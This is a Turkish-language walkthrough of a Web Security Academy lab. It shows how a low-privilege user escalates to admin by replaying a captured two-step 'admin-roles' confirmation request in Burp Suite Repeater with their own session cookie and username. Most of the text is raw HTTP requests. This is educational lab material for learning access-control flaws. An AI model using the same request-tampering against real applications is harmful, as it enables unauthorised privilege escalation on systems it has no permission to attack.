Bu sefer yetki yükseltmek için iki adımlı doğrulama gerekli. Admin hesabıma giriş yaptıktan sonra 2.doğrulamaya geldiğim zaman ki isteği yakalıyorum.
ve tüm sayfanın çıktısını not ediyorum,yani;
POST /admin-roles HTTP/1.1
Host: ac651f651e5f957e80c74f84003400f6.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac651f651e5f957e80c74f84003400f6.web-security-academy.net/admin-roles
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Connection: close
Cookie: session=hR14R3lB7swETeYNQSdu7gW6IZZ6QdMf
Upgrade-Insecure-Requests: 1
action=upgrade&confirmed=true&username=carlos
wiener kullanıcıma giriş yapıyorum,anasayfaya istek atıp Burp Suite ile yakalayıp Repeater’a gönderiyorum ve şu değişiklikleri yapıyorum;
POST /admin-roles HTTP/1.1 //değişecek alan 1
Host: ac651f651e5f957e80c74f84003400f6.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac651f651e5f957e80c74f84003400f6.web-security-academy.net/admin-roles //değişecek alan 2
Connection: close
Cookie: session=Yuuia43uWP9q47wHzZKFSPSYR4InloJo
Upgrade-Insecure-Requests: 1
Content-Length: 45
action=upgrade&confirmed=true&username=wiener //eklenecek alan 3
Send request ve Follow Redirection dedikten sonra laboratuvar ortamınız çözülmüş olacak.